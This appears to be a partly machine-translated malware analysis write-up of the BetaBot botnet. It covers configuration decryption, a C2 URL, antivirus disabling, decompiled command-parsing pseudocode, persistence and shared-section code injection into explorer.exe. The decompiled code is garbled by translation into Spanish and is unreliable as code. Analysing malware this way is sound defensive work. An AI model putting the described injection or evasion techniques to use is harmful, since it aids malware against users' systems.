Análisis de malware
Análisis Beta Bot: Parte 2
1 de octubre de por Ayoub Faouzi
Extrayendo la configuración de la botnet:
La configuración del bot se cifra dentro del bot y se descifra mientras el bot se está ejecutando. En las versiones 1.0.2.5, 1.5 y 1.6, BetaBot usa RC4 y algo de cifrado XOR; Puede localizar fácilmente la configuración cifrada mirando el mágico 0x0D46 que es el inicio del encabezado de configuración. Sin embargo, en la versión 1.7, BetaBot utiliza otra capa de cifrado ubicada en VA 004476F3.
Segunda capa de cifrado:
Observe que el host aún no está completamente desenmascarado:
Luego, después de rastrear esta rutina, CnC encontró: notchangeme.su/luck/order.php
Creación de procesos
Betabot intenta iniciar explorer.exe y, si eso falla, utiliza wuaudclt.exe. Para este tutorial, se utiliza Explorer.exe. El proceso se inicia realizando una llamada directa a CreateProcessInteralW.
Comprobaciones AV:
BetaBot busca los siguientes programas antivirus y los deshabilita si los encuentra en la clave de registro, dejando las computadoras vulnerables a verse comprometidas y sin recibir actualizaciones AV.
Comandos de análisis:
En t
__cdecl
Parse_Commands ()
{
const WCHAR * szCommandline; //esi@1
intdwCommandLen ; // edi@2
LPWSTR * argv; // eax@3
int v3; //edi@6
constante WCHAR * v4; //esi@7
int v5; // eax@12
int v6; // eax@27
int v7; // eax@37
carácter v9; // [sp+0h] [pb-458h]@0
const WCHAR szCommand[ 522 ]; // [sp+10h] [pb-448h]@1
carácter v11; // [sp+424h] [pb-34h]@15
carácter v12; // [sp+438h] [pb-@44
intv13 ; // [sp+44Canal] [pb-Canal]@6
int v14; // [sp+450h] [pb-8h]@5
int iNumArgs; // [sp+454h] [pb-4h]@1
// Comandos de análisis de BetaBot
szCommandline = GetCommandLineW();
iNumArgs =
0 ;
memset(szCommand, 0 , 1040 );
si (szCommandline)
{
dwCommandLen = wcslen(( int )szCommandline);
si ( ( sin firmar
int )dwCommandLen =
3 )
{
lstrcpynW((LPWSTR)szCommand, szCommandline, 519 );
CharLowerBuffW((LPWSTR)szCommand, dwCommandLen);
argv = CommandLineToArgvW(szCommand, iNumArgs);
si ( iNumArgs
0 )
{
si (argv)
{
v14 =
0 ;
si ( iNumArgs
0 )
{
v3 = ( int )(argv +
1 );
v13 = ( int )(argv +
1 );
hacer
{
v4 = ( const WCHAR * )( * (_DWORD * )(v3 –
4 ) +
2 );
si ( lstrcmpiW((LPCWSTR)( * (_DWORD * )(v3 –
4 ) +
2 ), L»cp» ) )
{
si ( lstrcmpiW(v4, L»testme» ) )
{
si ( lstrcmpiW(v4, L»ssp» ) )
{
si ( lstrcmpiW(v4, L»suac» ) )
{
si ( lstrcmpiW(v4, L»uac» ) lstrcmpiW(v4, L»puac» ) )
{
si ( lstrcmpiW(v4, L»nuac» ) )
{
si ( lstrcmpiW(v4, L»ron» ) )
{
if ( lstrcmpiW(v4, L»tarea» ) lstrcmpiW(v4, L»un» ) lstrcmpiW(v4, L»dbg» ) )
{
si ( lstrcmpiW(v4, L»ins» ) )
{
si (lstrcmpiW(v4, L»ext» ))
{
si ( ! lstrcmpiW(v4, L»upd» ))
* (_DWORD * )(gran_búfer +
10 ) |=
0x1000u ;
}
demás
{
Proceso de salida( 0 );
}
}
demás
{
v6 =
* (_DWORD * )(gran_búfer +
10 );
si ( ! (v6 y
4 ) )
* (_DWORD * )(gran_búfer +
10 ) = v6 |
4 ;
}
}
}
demás
{
* (_DWORD * )(gran_búfer +
10 ) |=
0x100u ;
}
ir a LABEL_49;
}
si ( * (_BYTE * )(gran_búfer +
10 ) y
0x
{
sub_40DFDA( 0 , 0 );
Dormir ( 0x64u );
sub_423C88();
sub_407EF8();
Dormir ( 0x384u );
}
}
demás
{
si ( * (_BYTE * )(gran_búfer +
10 ) y
0x
{
sub_40DFDA( 0 , 0 );
si ( iNumArgs = v14 +
1
** (_WORD ** )v3 )
lstrcpynW((LPWSTR) unk_43EC98, * (LPCWSTR * )v3, 259 );
sub_407FD8( 0 );
v7 =
* (_DWORD * )(gran_búfer +
18 );
si (v7 y
0x/p>
|| v7 y
2 )
ZwTerminateProcess ( -1 , 0 );
Dormir ( 0xC8u );
si ( lstrcmpiW(v4, L»puac» ) )
sub_423C88();
demás
sub_423BFE(búfer_grande +
5702 , 1 );
si ( ! ( * (_BYTE * )(buffer_grande +
18 ) y
1 ) )
{
sub_407EF8();
sub_407C19( y v12);
}
si (sub_403145(off_438A40, «LSF» )
0x400 )
sub_40494B();
sub_4079DF();
v3 = v13;
}
}
}
demás
{
sub_40DFDA( 0 , 0 );
Dormir ( 0xFA0u );
sub_407FD8( 0 );
v5 =
* (_DWORD * )(gran_búfer +
18 );
si (v5 y
0x/p>
|| v5 y
2 )
ZwTerminateProcess ( -1 , 0 );
sub_407EF8();
sub_407C19( y v11);
}
ZwTerminateProcess ( -1 , 0 );
}
}
demás
{
PathFindFileNameW((LPCWSTR)(large_buffer +
5054 ));
sub_40227A( L»¡Funciona! PID: %d, Nombre: %s» , dwProcessId);
sub_40227A( L»Betabot (c)-, codificado por Userbased» , v9);
}
}
ETIQUETA_49:
++ v14;
v3 +=
4 ;
v13 = v3;
}
mientras (v14 iNumArgs);
}
}
}
}
}
devolver
0 ;
}
Dropped Files:
BetaBot takes a copy of the binary that created the initial process from earlier and moves it to «C:Program Filescommon filesownerfilename».
In addition, it creates the registry key:
SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsupiucdlve.exe»)
API Hook and Code Injection:
The malware applies the Ring 3 hook in two ways. First, the malware adds a pre-operation filter for each of the following Zw* APIs:
- ZwCreateFile
- ZwOpenFile
- ZwDeleteFile
- ZwSetInformationFile
- ZwQueryDirectoryFile
- ZwCreateKey
- ZwOpenKey
- ZwSetValueKey
- ZwOpenProcess
- ZwTerminateProcess
- ZwCreateThread
- ZwCreateThreadEx
- ZwResumeThread
- ZwSuspendThread
- ZwSetContextThread
- ZwOpenThread
- ZwUnmapViewOfSection
- ZwDeviceIoControlFile
- ZwQueueApcThread
The malware creates a section by calling ZwCreateSection procedure. The purpose of this is to create a section (of memory) object and to return a handler. This section object represents an area of memory that can be shared. It is accessed through the returned handler. .
This handler is used to map views of the memory sections using ZwMapViewOfSection procedure. This procedure maps a view of the memory section in a process. This procedure is called twice using the same handler. Once is for the current process and once is for the remote process (explorer.exe). Now once the memory is mapped it is now possible to read/write to that section.
Using the same section handler allows for simultaneous writing to both sections of memory. This means that writing to the section of memory in the local process will also write to the remote process. This avoids the use of functions that raise red flags for anybody that is analyzing the sample.
The Betabot code is written to the mapped section of memory in the local process, thus writing it to explorer.exe. Of course, this isn’t enough; something needs to be done to have this code executed in the process. To get code execution ntdll.dll is hooked in the explorer.exe process using the same method.
Conclusion:
This write-up highlighted some of the methods that BetaBot is using to both obfuscate and inject code. It also covered how to extract the configuration details. There is a broad range of functionality that was not covered (UAC Bypass, Skype stuff, CnC communication, etc.). If we can come back around to this sample, I’d like to highlight those as well.
Credits and References:
- https://github.com/KenMacD/betabot-re
- https://blog.fortinet.com/post/neurevt-bot-analysis
- http://vrt-blog.snort.org//05/betabot-process-injection.html
- https://asert.arbornetworks.com/beta-bot-a-code-review/